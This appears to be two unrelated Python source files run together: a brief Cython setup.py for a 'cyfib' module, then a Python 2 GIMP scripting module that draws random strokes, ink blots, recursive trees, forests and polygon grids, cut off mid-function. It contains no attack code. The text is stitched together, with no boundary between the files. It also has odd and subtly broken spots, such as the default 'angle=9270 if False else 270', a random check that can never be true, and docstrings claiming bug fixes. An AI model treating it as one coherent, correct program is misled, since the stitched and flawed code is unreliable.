# coding=utf-8
from setuptools import setup
from Cython.Build import cythonize

# Build the cyfib Cython extension module from cyfib.pyx.
# embedsignature=True embeds the call signature into the generated docstrings.
setup(
    name="cyfib",
    ext_modules=cythonize('cyfib.pyx', compiler_directives={'embedsignature': True}),
)

import random, math
import gimp_be
#from gimp_be.utils.quick import qL
from gimp_be.image.layer import editLayerMask
from effects import mirror
import numpy as np
import UndrawnTurtle as turtle

def brushSize(size=-1):
    """"
    Set brush size
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if size < 1:
        size = random.randrange(2, ((image.height + image.width) / 8))
    gimp_be.pdb.gimp_context_set_brush_size(size)

# Set brush opacity
def brushOpacity(op=-1):
    """Set the brush opacity and return it; op == -1 picks a random value in [15, 100)."""
    chosen = random.randrange(15, 100) if op == -1 else op
    gimp_be.pdb.gimp_brushes_set_opacity(chosen)
    return chosen

# Set brush foreground/background colors; with no parameters both are randomized
def brushColor(r1=-1, g1=-1, b1=-1, r2=-1, g2=-1, b2=-1):
    """Set foreground (r1,g1,b1) and/or background (r2,g2,b2) colors.

    With no arguments, both colors are fully randomized.
    Returns the (r1, g1, b1, r2, g2, b2) tuple actually used.

    NOTE(review): calling with only r1 set (e.g. brushColor(0)) passes
    (r1, -1, -1) to the foreground — confirm GIMP clamps/accepts -1.
    """
    # Explicit foreground requested.
    if not r1 == -1:
        gimp_be.pdb.gimp_context_set_foreground((r1, g1, b1))
    # Explicit background requested.
    if not r2 == -1:
        gimp_be.pdb.gimp_context_set_background((r2, g2, b2))
    elif r1 == -1:
        # Neither color given: randomize both foreground and background.
        r1 = random.randrange(0, 255)
        g1 = random.randrange(0, 255)
        b1 = random.randrange(0, 255)
        r2 = random.randrange(0, 255)
        g2 = random.randrange(0, 255)
        b2 = random.randrange(0, 255)
        gimp_be.pdb.gimp_context_set_foreground((r1, g1, b1))
        gimp_be.pdb.gimp_context_set_background((r2, g2, b2))
    return (r1, g1, b1, r2, g2, b2)

#set gray scale color
def grayColor(gray_color):
    """Set the foreground to a neutral gray of the given intensity."""
    level = (gray_color, gray_color, gray_color)
    gimp_be.pdb.gimp_context_set_foreground(level)

# Set random brush
def randomBrush():
    """Select a random installed brush and return its name."""
    brushes = gimp_be.pdb.gimp_brushes_get_list('')[1]
    pick = brushes[random.randrange(0, len(brushes))]
    gimp_be.pdb.gimp_brushes_set_brush(pick)
    return pick

# Set random brush dynamics
def randomDynamics():
    """Activate random paint dynamics and return the chosen name."""
    names = gimp_be.pdb.gimp_dynamics_get_list('')[1]
    pick = random.choice(names)
    gimp_be.pdb.gimp_context_set_dynamics(pick)
    return pick

def qL():
    """Quickly add a new layer and fill it (fill mode 1 — presumably background; confirm against GIMP constants)."""
    gimp_be.addNewLayer()
    img = gimp_be.gimp.image_list()[0]
    target = gimp_be.pdb.gimp_image_active_drawable(img)
    gimp_be.pdb.gimp_edit_fill(target, 1)

def drawLine(points):
    """Stroke the default paintbrush through a flat [x0, y0, x1, y1, ...] coordinate list."""
    img = gimp_be.gimp.image_list()[0]
    canvas = gimp_be.pdb.gimp_image_active_drawable(img)
    gimp_be.pdb.gimp_paintbrush_default(canvas, len(points), points)

def drawSpiral(n=140, angle=61, step=10, center=None):
    """
    Draw a turtle-generated spiral as a single stroked line.

    n      -- number of spiral segments
    angle  -- left turn in degrees after each segment
    step   -- unused; kept for backward compatibility (the forward
              distance is the segment index, growing each iteration)
    center -- [x, y] spiral center; image center when omitted

    Fixes: the loop variable shadowed the `step` parameter (the parameter
    never had any effect), and the mutable default `center=[]` is gone.
    """
    coords = []
    nt = turtle.Turtle()
    if not center:
        image = gimp_be.gimp.image_list()[0]
        center = [image.width / 2, image.height / 2]
    for i in range(n):
        coords.append(int(nt.position()[0] * 10) + center[0])
        coords.append(int(nt.position()[1] * 10) + center[1])
        nt.forward(i)
        nt.left(angle)
        coords.append(int(nt.position()[0] * 10) + center[0])
        coords.append(int(nt.position()[1] * 10) + center[1])
    drawLine(coords)

def drawRays(rays=32, rayLength=100, centerX=0, centerY=0):
    """"
    draw N rays from center in active drawable with current brush
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if centerX == 0:
        centerX = image.width/2
    if centerY == 0:
        centerY = image.height/2
    ray_gap = int(360.0/rays)
    for ray in range(0,rays):
        ctrlPoints = centerX, centerY, centerX + rayLength * math.sin(math.radians(ray*ray_gap)), centerY + rayLength * math.cos(math.radians(ray*ray_gap))
        drawLine(ctrlPoints)

def drawRandomRays(rays=32, length=100, centerX=0, centerY=0, noise=0.3):
    """Draw `rays` strokes from a center at random angles; lengths jitter by +/- noise."""
    img = gimp_be.gimp.image_list()[0]
    gimp_be.pdb.gimp_image_active_drawable(img)
    if centerX == 0:
        centerX = img.width / 2
    if centerY == 0:
        centerY = img.height / 2
    ray_gap = 360.0 / rays  # NOTE(review): computed but unused below (angles are random)
    for _ in range(0, rays):
        span = random.choice(range(int(length - length * noise), int(length + length * noise)))
        theta = random.choice(np.arange(0.0, 360.0, 0.01))
        endpoints = [centerX, centerY,
                     centerX + int(span * math.sin(math.radians(theta))),
                     int(centerY + span * math.cos(math.radians(theta)))]
        drawLine(endpoints)

def spikeBallStack(depth=20, layer_mode=6, flatten=0):
    """Stack depth-1 layers of random rays; flatten every `flatten` layers (0 = never)."""
    for layer_num in range(1, depth):
        img = gimp_be.gimp.image_list()[0]
        gimp_be.pdb.gimp_image_active_drawable(img)
        qL()
        gimp_be.pdb.gimp_layer_set_mode(gimp_be.pdb.gimp_image_get_active_layer(img), layer_mode)
        drawRandomRays(rays=random.choice([32, 64, 128, 4]),
                       length=(img.height / 2 - img.height / 12),
                       centerX=img.width / 2,
                       centerY=img.height / 2,
                       noise=random.choice([0.3, 0.1, 0.8]))
        if flatten and not layer_num % flatten:
            gimp_be.pdb.gimp_image_flatten(img)

def randomStrokes(num = 4, opt = 1):
    """
    Draw `num` brush strokes at random positions inside the image.

    opt -- when 1, the brush size is fixed at 35 for every stroke.

    BUG FIX: the original referenced an undefined `ctrlPoints`, raising
    NameError on every call; random stroke endpoints are now generated.
    """
    image = gimp_be.gimp.image_list()[0]
    r = random.randrange
    for loopNum in range(0, num):
        if opt == 1:
            brushSize(35)
        ctrlPoints = (r(0, image.width), r(0, image.height),
                      r(0, image.width), r(0, image.height))
        drawLine(ctrlPoints)

# draw random color bars, opt 3 uses random blend
def drawBars(barNum=10, opt=3):
    """Fill the image with barNum vertical bars.

    opt == 3 fills each bar with a random blend; opt == 2 picks a random
    brush color per bar; anything else bucket-fills with the current color.
    Returns (barNum, opt, color) where color is the last random color
    tuple used, or -1 if none was chosen.
    """
    img = gimp_be.gimp.image_list()[0]
    canvas = gimp_be.pdb.gimp_image_active_drawable(img)
    width = img.width / barNum
    color = -1
    for idx in range(barNum):
        gimp_be.pdb.gimp_image_select_rectangle(img, 2, idx * width, 0, width, img.height)
        if opt == 3:
            randomBlend()
        else:
            if opt == 2:
                color = brushColor()
            gimp_be.pdb.gimp_edit_bucket_fill_full(canvas, 0, 0, 100, 0, 1, 0, gimp_be.SELECT_CRITERION_COMPOSITE, 0, 0)
    gimp_be.pdb.gimp_selection_none(img)
    return (barNum, opt, color)

# draw carbon nano tube
def drawCNT():
    """Draw a carbon-nanotube-like figure: a sine wave between two horizontal rails."""
    img = gimp_be.gimp.image_list()[0]
    canvas = gimp_be.pdb.gimp_image_active_drawable(img)
    drawSinWave(1, 4, img.height * .42, 0, img.height / 2)
    bottom = img.height - 80
    gimp_be.pdb.gimp_paintbrush(canvas, 0, 4, (0, bottom, img.width, bottom), 0, 0)
    gimp_be.pdb.gimp_paintbrush(canvas, 0, 4, (0, 80, img.width, 80), 0, 0)

# draw sine wave
def drawSinWave(bar_space=32, bar_length=-1, mag=70, x_offset=-1, y_offset=-1):
    """Draw vertical bars whose centers follow a sine curve across the image.

    Any parameter left at -1 falls back to an image-derived default.
    """
    img = gimp_be.gimp.image_list()[0]
    if y_offset == -1:
        y_offset = img.height / 2
    if x_offset == -1:
        x_offset = 0
    if bar_length == -1:
        bar_length = img.height / 6
    half = round(bar_length / 2)
    for step in range(0, img.width / bar_space):
        x = step * bar_space + x_offset
        y = int(round(math.sin(x) * mag) + y_offset)
        drawLine((x, int(y - half), x, int(y + half)))

# draw sine wave
def drawSinWaveDouble(barSpace, barLen, mag):
    """Draw vertical bars along a sine curve; abs() keeps the center line non-negative."""
    img = gimp_be.gimp.image_list()[0]
    half = round(barLen / 2)
    for step in range(1, img.width / barSpace):
        x = step * barSpace
        y = int(abs(round(math.sin(x) * mag + img.height / 2)))
        drawLine((x, int(y - half), x, int(y + half)))

# draw a single brush point
def drawBrush(x1, y1):
    """Stamp a single brush dab at (x1, y1) via a zero-length stroke."""
    img = gimp_be.gimp.image_list()[0]
    gimp_be.pdb.gimp_image_active_drawable(img)
    drawLine((x1, y1, x1, y1))

# draw multiple brush points
def drawMultiBrush(brush_strokes=24):
    """Stamp brush dabs on a square grid of side sqrt(brush_strokes)."""
    img = gimp_be.gimp.image_list()[0]
    side = int(math.sqrt(brush_strokes))
    cell_w = img.width / side
    cell_h = img.height / side
    x = 0
    for _ in range(side):
        x += cell_w
        y = 0
        for _ in range(side):
            y += cell_h
            drawBrush(x, y)

# draw grid of dots for remainder mapping; this is incomplete and temporary. TODO: DON'T FORGET
def dotGrid():
    """Stamp a grid of gray dots every 20 px (author-flagged incomplete/temporary).

    Note: `^` is bitwise XOR, not exponentiation; with operator precedence
    the gray level evaluates as abs((i ^ (3 - x)) ^ 3) % 256 — TODO confirm
    this is the intended "remainder mapping".
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    for i in range(10,image.width-10,20):
        for x in range(10, image.height-10,20):
            grayColor(abs(i^3-x^3)%256)
            drawBrush(i+10,x+10)

# draws random filled circles; even values of opt randomize the color
def randomCircleFill(num=20, size=100, opt=3, sq=1):
    """
    Draw `num` randomly placed filled ellipses (perfect circles when sq).

    Even opt randomizes the brush color per shape; opt divisible by 3 uses
    a random blend instead of a plain bucket fill.

    BUG FIX: the blend branch tested `opt % 3 == 3`, which can never be
    true (a mod-3 result is 0..2), so randomBlend() was unreachable; it
    now tests `opt % 3 == 0`, matching randomRectFill.
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    for loopNum in range(0, num):
        cirPar = [random.randrange(0, image.width), random.randrange(0, image.height),
                  random.randrange(10, size), random.randrange(10, size)]
        if opt % 2 == 0:
            brushColor()
        if sq:
            gimp_be.pdb.gimp_ellipse_select(image, cirPar[0], cirPar[1], cirPar[2], cirPar[2], 2, 1, 0, 0)
        else:
            gimp_be.pdb.gimp_ellipse_select(image, cirPar[0], cirPar[1], cirPar[2], cirPar[3], 2, 1, 0, 0)
        if opt % 3 == 0:
            randomBlend()
        else:
            gimp_be.pdb.gimp_edit_bucket_fill_full(drawable, 0, 0, 100, 0, 1, 0, gimp_be.SELECT_CRITERION_COMPOSITE, 0, 0)
    gimp_be.pdb.gimp_selection_none(image)

def randomRectFill(num=20, size=100, opt=3, sq=0):
    """Draw `num` randomly placed filled rectangles (squares when sq).

    Even opt randomizes the brush color per shape; opt divisible by 3
    uses a random blend instead of a bucket fill.
    """
    img = gimp_be.gimp.image_list()[0]
    canvas = gimp_be.pdb.gimp_image_active_drawable(img)
    # NOTE(review): selectMode is computed but never passed to the select
    # calls below (mode 2 is hard-coded) — possibly an unfinished feature.
    selectMode = 0 if opt % 5 == 0 else 2
    for _ in range(0, num):
        if opt % 2 == 0:
            brushColor()
        left = random.randrange(0, img.width)
        top = random.randrange(0, img.height)
        w = random.randrange(10, size)
        h = random.randrange(10, size)
        if sq:
            gimp_be.pdb.gimp_image_select_rectangle(img, 2, left, top, w, w)
        else:
            gimp_be.pdb.gimp_image_select_rectangle(img, 2, left, top, w, h)
        if opt % 3 == 0:
            randomBlend()
        else:
            gimp_be.pdb.gimp_edit_bucket_fill_full(canvas, 0, 0, 100, 0, 1, 0, gimp_be.SELECT_CRITERION_COMPOSITE, 0, 0)
    gimp_be.pdb.gimp_selection_none(img)

def randomBlend():
    """
    Apply a gimp blend between two random points with randomized gradient
    type, opacity, repeat and supersampling depth, after randomizing the
    foreground/background colors.

    Fix: removed a dead `threshold = 0` that was immediately overwritten.
    """
    blend_mode = 0
    paint_mode = 0
    gradient_type = random.randrange(0, 10)
    opacity = random.randrange(20, 100)
    offset = 0
    repeat = random.randrange(0, 2)
    reverse = 0
    supersample = 0
    max_depth = random.randrange(1, 9)
    # randrange(0, 1) always yields 0; the call is kept so the RNG
    # sequence (and thus downstream random draws) is unchanged.
    threshold = random.randrange(0, 1)
    dither = 0
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    brushColor()
    x1 = random.randrange(0, image.width)
    y1 = random.randrange(0, image.height)
    x2 = random.randrange(0, image.width)
    y2 = random.randrange(0, image.height)
    gimp_be.pdb.gimp_blend(drawable, blend_mode, paint_mode, gradient_type, opacity, offset, repeat, reverse, supersample, max_depth, threshold, dither, x1, y1, x2, y2)

def randomPoints(num=12, boarder=0):
    """
    Return a flat [x0, y0, x1, y1, ...] list of `num` random points inside
    the active image, keeping `boarder` pixels away from the edges.

    BUG FIX: the original referenced undefined names (`choice`, `boarder`,
    `image`) and raised NameError; it now uses random.choice, takes the
    margin as a defaulted parameter, and fetches the active image itself.
    """
    image = gimp_be.gimp.image_list()[0]
    d = []
    for x in range(num):
        d.append(random.choice(range(boarder, image.width - boarder)))
        d.append(random.choice(range(boarder, image.height - boarder)))
    return d

def drawInkBlot(option=''):
    """Paint a Rorschach-style ink blot: layered black/white circle fills,
    two random smudges, then a horizontal mirror.

    option -- if it contains 'trippy', work happens on a layer mask over a
    random blend, and the result may be randomly inverted.
    """
    image=gimp_be.gimp.image_list()[0]
    layer=gimp_be.pdb.gimp_image_get_active_layer(image)
    if 'trippy' in option:
        # Duplicate the layer, blend the copy, and paint into a mask (mode 5).
        layer_copy = gimp_be.pdb.gimp_layer_copy(layer, 0)
        gimp_be.pdb.gimp_image_add_layer(image, layer_copy,1)
        randomBlend()
        mask = gimp_be.pdb.gimp_layer_create_mask(layer,5)
        gimp_be.pdb.gimp_image_add_layer_mask(image, layer,mask)
        editLayerMask(1)
    # Alternating layers of large/small circle fills in white and black.
    # NOTE(review): brushColor(0) passes (0, -1, -1) as the foreground —
    # confirm GIMP treats that as black.
    randomCircleFill(num=15,size=800)
    brushColor(255,255,255)
    randomCircleFill(num=50,size=100)
    randomCircleFill(num=5,size=300)
    brushColor(0)
    randomCircleFill(num=20,size=600)
    randomCircleFill(num=50,size=400)
    randomCircleFill(num=100,size=100)
    brushColor(255,255,255)
    randomCircleFill(num=50,size=100)
    brushColor(0)
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    # Two random smudge strokes over the left half, with random pressure.
    brushSize()
    strokes=[random.randrange(0,image.width/2),random.randrange(0,image.height),random.randrange(0,image.width/2),random.randrange(0,image.height)]
    gimp_be.pdb.gimp_smudge(drawable, random.choice([1,5,10,50,100]), len(strokes), strokes)
    brushSize()
    strokes=[random.randrange(0,image.width/2),random.randrange(0,image.height),random.randrange(0,image.width/2),random.randrange(0,image.height)]
    gimp_be.pdb.gimp_smudge(drawable, random.choice([1,5,10,50,100]), len(strokes), strokes)
    # Mirror horizontally to get the symmetric ink-blot look.
    mirror('h')
    if 'trippy' in option and random.choice([0,1]):
        drawable = gimp_be.pdb.gimp_image_active_drawable(image)
        gimp_be.pdb.gimp_invert(drawable)
        editLayerMask(0)

def inkBlotStack(depth=16, layer_mode=6, flatten=0):
    """
    Stack depth-1 ink-blot layers with the given layer mode.

    flatten -- flatten the image every `flatten` layers (0 = never).

    BUG FIX: the original called `flatten()` — i.e. the integer parameter —
    which raised TypeError; it now flattens the image like spikeBallStack.
    """
    for x in range(1, depth):
        image = gimp_be.gimp.image_list()[0]
        drawable = gimp_be.pdb.gimp_image_active_drawable(image)
        qL()
        gimp_be.pdb.gimp_layer_set_mode(gimp_be.pdb.gimp_image_get_active_layer(image), layer_mode)
        drawInkBlot()
        if flatten:
            if not x % flatten:
                gimp_be.pdb.gimp_image_flatten(image)

def gridCenters(grid=None):
    """
    Return the center [x, y] of each tile in a columns-x-rows grid over
    the active image.

    grid -- [columns, rows]; defaults to a 4x3 grid.

    Fix: replaced the mutable default argument `grid=[]` with None
    (callers passing nothing or [] still get [4, 3]).
    """
    if not grid:
        grid = [4, 3]
    image = gimp_be.gimp.image_list()[0]
    row_width = image.width / grid[0]
    columb_height = image.height / grid[1]
    tile_centers = []
    for row in range(0, grid[0]):
        for columb in range(0, grid[1]):
            tile_centers.append([row_width * row + row_width / 2,
                                 columb_height * columb + columb_height / 2])
    return tile_centers

def tile(grid=[],option="mibd",irregularity=0.3):
    """Stamp a brush dab at (optionally jittered) grid tile centers.

    grid         -- [columns, rows]; picked from the image aspect when empty
    option       -- flag characters: m=layer mask, b=random brush,
                    d=random dynamics, g=gaussian blur, w=whirl-pinch,
                    i=invert
    irregularity -- 0 disables jitter; otherwise tile centers are offset by
                    +/- grid_spacing*irregularity and some dabs are skipped
                    in favor of re-randomizing dynamics.

    NOTE(review): the loop variable `tile` shadows this function's name,
    and random.randrange(50.0*irregularity) passes a float — that only
    works when the product is integral; confirm intended.
    """
    image=gimp_be.gimp.image_list()[0]
    layer=gimp_be.pdb.gimp_image_get_active_layer(image)
    if grid==[]:
        # Choose grid shape from the image aspect ratio.
        if image.height == image.width:
            grid=[4,4]
        elif image.height < image.width:
            grid=[3,4]
        else:
            grid=[4,3]
    if "m" in option:
        # Paint into a fresh white layer mask instead of the layer itself.
        mask = gimp_be.pdb.gimp_layer_create_mask(layer,0)
        gimp_be.pdb.gimp_image_add_layer_mask(image, layer,mask)
        editLayerMask(1)
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    grid_spacing = image.width/grid[0]
    tile_centers=gridCenters(grid)
    if irregularity > 0.0:
        # Jitter every tile center by up to +/- grid_spacing*irregularity.
        i_tiles=[]
        for tile in tile_centers:
            tile[0]=tile[0]+random.randrange((-1*int(grid_spacing*irregularity)),int(grid_spacing*irregularity))
            tile[1]=tile[1]+random.randrange((-1*int(grid_spacing*irregularity)),int(grid_spacing*irregularity))
            i_tiles.append(tile)
        tile_centers=i_tiles
    if "b" in option:
        randomBrush()
    if "d" in option:
        randomDynamics()
    brushSize(grid_spacing)
    brushColor(0,0,0)
    for tile in tile_centers:
        if "m" in option:
            editLayerMask(1)
        if irregularity == 0:
            gimp_be.pdb.gimp_paintbrush_default(drawable, len(tile), tile)
        elif random.randrange(50.0*irregularity)+random.randrange(50.0*irregularity)>50.0:
            # Occasionally skip the dab and reshuffle dynamics instead.
            randomDynamics()
        else:
            gimp_be.pdb.gimp_paintbrush_default(drawable, len(tile), tile)
    if "g" in option:
        gimp_be.pdb.plug_in_gauss(image, drawable, 20.0, 20.0, 0)
    if "w" in option:
        gimp_be.pdb.plug_in_whirl_pinch(image, drawable, 90, 0.0, 1.0)
    if "i" in option:
        gimp_be.pdb.gimp_invert(drawable)
    if "m" in option:
        editLayerMask(0)

def drawAkuTree(branches=6,tree_height=0, position=0):
    """Draw a stylized tree: a vertical trunk with alternating left/right
    branch nodes, each ending in a short upward twig.

    branches    -- number of branch nodes along the trunk
    tree_height -- trunk height in px; 0 picks a random height from position
    position    -- [x, y] trunk base; 0 picks a random base point
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if position==0:
        # Random base point in the lower part of the image.
        position=[]
        position.append(random.randrange(image.width))
        position.append(random.randrange(4*tree_height/3, 3*image.height/4))
    if tree_height == 0:
        tree_height=random.randrange(position[1]/3, position[1]-position[1]/25)
    print 'position:' + str(position)
    #draw trunk
    trunk=[position[0],position[1],position[0],position[1]-tree_height]
    trunk_size=tree_height/40+3
    print str(trunk)
    print 'tree_height: ' + str(tree_height)
    print 'trunk size: ' + str(trunk_size)
    brushSize(trunk_size)
    drawLine(trunk)
    for node in range(branches):
        # Node position along the trunk, with small vertical jitter.
        node_base=[position[0],position[1]-((node*tree_height+1)/branches+tree_height/25+random.randrange(-1*tree_height/12,tree_height/12))]
        base_length=tree_height/25
        node_end=[]
        # Alternate branches right (even nodes) and left (odd nodes).
        if node%2==0:
            node_end=[node_base[0]+base_length/2,node_base[1]-base_length/2]
            brushSize(2*trunk_size/3)
            drawLine([node_base[0],node_base[1],node_end[0],node_end[1]])
            brushSize(trunk_size/3)
            drawLine([node_end[0],node_end[1],node_end[0],node_end[1]-tree_height/12-(tree_height/48)])
        else:
            node_end=[node_base[0]-base_length/2,node_base[1]-base_length/2]
            brushSize(2*trunk_size/3)
            drawLine([node_base[0],node_base[1],node_end[0],node_end[1]])
            brushSize(trunk_size/3)
            drawLine([node_end[0],node_end[1],node_end[0],node_end[1]-(tree_height/12)])

def drawAkuForest(num=25):
    """Draw `num` randomly placed Aku trees."""
    for _ in range(num):
        drawAkuTree()

# draw a tree
def drawTree(x1=-1, y1=-1, angle=270, depth=9, recursiondepth=0):
    """Recursively draw a binary tree; brush size and color scale with depth."""
    img = gimp_be.gimp.image_list()[0]
    canvas = gimp_be.pdb.gimp_image_active_drawable(img)
    if x1 == -1:
        x1 = img.width / 2
    if y1 == -1:
        y1 = img.height / 2
    x2 = x1 + int(math.cos(math.radians(angle)) * depth * 10.0)
    y2 = y1 + int(math.sin(math.radians(angle)) * depth * 10.0)
    # Brown near the root, orange for twigs, green near the leaves.
    if recursiondepth <= 2:
        brushColor(87, 53, 12)
    elif depth == 1:
        brushColor(152, 90, 17)
    elif depth <= 3:
        brushColor(7, 145, 2)
    brushSize(depth * 4 + 5)
    segment = (x1, y1, x2, y2)
    gimp_be.pdb.gimp_paintbrush_default(canvas, len(segment), segment)
    if depth > 0:
        for turn in (-20, 20):
            drawTree(x2, y2, angle + turn, depth - 1, recursiondepth + 1)

# draw a tree with 3 branches per node
def drawTriTree(x1=-1, y1=-1, angle=270, depth=6, recursiondepth=0, size=10):
    """Recursively draw a ternary tree with jittered branch endpoints and random colors."""
    img = gimp_be.gimp.image_list()[0]
    canvas = gimp_be.pdb.gimp_image_active_drawable(img)
    if x1 == -1:
        x1 = img.width / 2
    if y1 == -1:
        y1 = img.height / 2
    if depth:
        x2 = x1 + int(math.cos(math.radians(angle)) * depth * size) + random.randrange(-12, 12)
        y2 = y1 + int(math.sin(math.radians(angle)) * depth * size) + random.randrange(-12, 12)
        segment = (x1, y1, x2, y2)
        brushSize(depth + int(size / 10))
        brushColor()
        gimp_be.pdb.gimp_paintbrush_default(canvas, len(segment), segment)
        for turn in (-30, 0, 30):
            drawTriTree(x2, y2, angle + turn, depth - 1, recursiondepth + 1, size)

# draw random color tri-tree
def drawColorTriTree(x1=-1, y1=-1, angle=9270 if False else 270, depth=9, recursiondepth=0):
    """
    Recursively draw a ternary tree with jittered branches and randomly
    perturbed branch angles.

    BUG FIX: random.choice was called with five separate arguments
    (`random.choice(-10, -5, 0, 5, 10)`); it takes a single sequence, so
    every call raised TypeError. The jitter options are now a list.
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if x1 == -1:
        x1 = image.width / 2
    if y1 == -1:
        y1 = image.height / 2
    brushSize(depth + 1)
    if depth:
        jitter = [-10, -5, 0, 5, 10]
        x2 = x1 + int(math.cos(math.radians(angle)) * depth * 10.0) + random.randrange(-12, 12)
        y2 = y1 + int(math.sin(math.radians(angle)) * depth * 10.0) + random.randrange(-12, 12)
        ctrlPoints = (x1, y1, x2, y2)
        gimp_be.pdb.gimp_paintbrush_default(drawable, len(ctrlPoints), ctrlPoints)
        drawColorTriTree(x2, y2, angle - 20 + random.choice(jitter), depth - 1, recursiondepth + 1)
        drawColorTriTree(x2, y2, angle + random.choice(jitter), depth - 1, recursiondepth + 1)
        drawColorTriTree(x2, y2, angle + 20 + random.choice(jitter), depth - 1, recursiondepth + 1)

# draw a tree
def drawOddTree(x1=-1, y1=-1, angle=270, depth=9, recursiondepth=0):
    """Draw a tree whose root level branches irregularly (extra or missing
    limbs depending on depth parity and a 1-in-23 skip chance).

    NOTE(review): the recursive calls go to drawTree, not drawOddTree, so
    the "odd" branching only applies at this top level — confirm intended.
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if x1 == -1:
        x1 = image.width/2
    if y1 == -1:
        y1 = image.height/2
    brushSize((depth * 8 + 30))
    if depth:
        x2 = x1 + int(math.cos(math.radians(angle)) * depth * 10.0)
        y2 = y1 + int(math.sin(math.radians(angle)) * depth * 10.0)
        ctrlPoints = (x1, y1, x2, y2)
        gimp_be.pdb.gimp_paintbrush_default(drawable, len(ctrlPoints), ctrlPoints)
        # 1-in-23 chance to draw no children at all.
        if not random.randrange(0, 23) == 23:
            drawTree(x2, y2, angle - 20, depth - 1, recursiondepth + 1)
            # Extra limbs for even depths, depths one short of a multiple
            # of 4, and a wide fork at depth 5.
            if depth % 2 == 0:
                drawTree(x2, y2, angle + 20, depth - 1, recursiondepth + 1)
            if (depth + 1) % 4 == 0:
                drawTree(x2, y2, angle + 20, depth - 1, recursiondepth + 1)
            if depth == 5:
                drawTree(x2, y2, angle - 45, depth - 1, recursiondepth + 1)
                drawTree(x2, y2, angle + 45, depth - 1, recursiondepth + 1)

# draw a tree
def drawForestTree(x1=-1, y1=-1, angle=270, depth=7, size=10, recursiondepth=0):
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if x1 == -1:
        x1 = image.width/2
    if y1 == -1:
        y1 = image.height/2
    if depth:
        x2 = x1 + int(math.cos(math.radians(angle)) * depth * 10.0)
        y2 = y1 + int(math.sin(math.radians(angle)) * depth * 10.0)
        ctrlPoints = (x1, y1, x2, y2)
        brushSize(depth * depth * (int(size / ((image.height - y1)) / image.height)) + 4)
        gimp_be.pdb.gimp_paintbrush_default(drawable, len(ctrlPoints), ctrlPoints)
        if not random.randrange(0, 23) == 23:
            drawForestTree(x2, y2, angle - 20, depth - 1, size, recursiondepth + 1)
            if random.randrange(0, 23) == 23:
                drawForestTree(x2, y2, angle - random.randrange(-30, 30), depth - 1, size, recursiondepth + 1)
                drawForestTree(x2, y2, angle - random.randrange(-30, 30), depth - 1, size, recursiondepth + 1)
                drawForestTree(x2, y2, angle - random.randrange(-30, 30), depth - 1, size, recursiondepth + 1)
            else:
                drawForestTree(x2, y2, angle - random.randrange(15, 50), depth - 1, size, recursiondepth + 1)
                if depth % 2 == 0:
                    drawForestTree(x2, y2, angle + 20, depth - 1, size, recursiondepth + 1)
                if (depth + 1) % 4 == 0:
                    drawForestTree(x2, y2, angle + 20, depth - 1, size, recursiondepth + 1)
                if depth == 5:
                    drawForestTree(x2, y2, angle - 45, depth - 1, size, recursiondepth + 1)
                    drawForestTree(x2, y2, angle + 45, depth - 1, size, recursiondepth + 1)

# draw a series of trees with a y position based on depth
def drawForest(trees, options):
    """Draw `trees` forest trees; vertical placement and size follow a baseline band.

    options -- accepted for interface compatibility; currently unused.
    """
    img = gimp_be.gimp.image_list()[0]
    baseline = 2 * (img.height / 3)
    spread = img.height / 5
    for _ in range(0, trees):
        y1 = baseline + random.randrange(-1 * spread, spread)
        x1 = random.randrange(img.width / 20, 19 * (img.width / 20))
        angle = random.randrange(250, 290)
        size = (y1 / (2.0 * (img.height / 3.0) + (img.height / 5.0))) + 4
        depth = random.randrange(3, 7)
        drawForestTree(x1, y1, angle, depth, size)

#draws polygon of N sides at a x-y location
def drawPolygon(sides=5, size=300, x_pos=0, y_pos=0, angle_offset=0):
    """Stroke a regular polygon of `sides` sides centered at (x_pos, y_pos).

    A center coordinate of 0 falls back to the image center.
    NOTE(review): x_pos is only defaulted when y_pos is also 0 — verify
    this asymmetry is intentional.
    """
    img = gimp_be.gimp.image_list()[0]
    canvas = gimp_be.pdb.gimp_image_active_drawable(img)
    if y_pos == 0:
        y_pos = img.height / 2
        if x_pos == 0:
            x_pos = img.width / 2
    step_deg = 360 / sides
    pts = []
    for i in range(0, sides + 1):
        theta = math.radians(step_deg * i + angle_offset)
        pts.append(int(round(math.sin(theta) * size)) + x_pos)
        pts.append(int(round(math.cos(theta) * size)) + y_pos)
    gimp_be.pdb.gimp_paintbrush(canvas, 0, len(pts), pts, 0, 0)

#draw a grid of polygons of N sides
def drawPolygonGrid(size=60,sides=3, angle_offset=0):
    """Tile the image with polygons of `sides` sides.

    Odd-sided (or >4-sided) polygons are drawn on a staggered grid with
    alternate rows flipped by half a turn; even-sided ones on a plain grid.

    NOTE(review): the code after the grid loops builds one more point list
    with no x/y offset and paints it — it looks like leftover/debug code
    from drawPolygon; confirm it is intended.
    """
    image = gimp_be.gimp.image_list()[0]
    drawable = gimp_be.pdb.gimp_image_active_drawable(image)
    if sides%2 == 1 or sides>4:
        # Staggered layout: every other polygon is shifted and rotated.
        for y in range(0-image.height/10,image.height+image.height/10, size):
            x_loop=0
            for x in range(0-image.width/10, image.width+image.width/10, size):
                if x_loop%2==1:
                    drawPolygon(sides,size-size/2,x-(size/2),y,360/sides)
                else:
                    drawPolygon(sides,size-size/2,x,y,0)
                x_loop=x_loop+1
    else:
        # Plain layout for even-sided polygons (note: x iterates heights here).
        for x in range(0-image.height/10,image.height+image.height/10, size):
            for y in range(0-image.width/10, image.width+image.width/10, size):
                drawPolygon(sides,size/3,x,y,0)
    degree_between_points=360/sides
    points_list=[]
    for x in range(0,sides+1):
        point_degree=math.radians(degree_between_points*x+angle_offset)
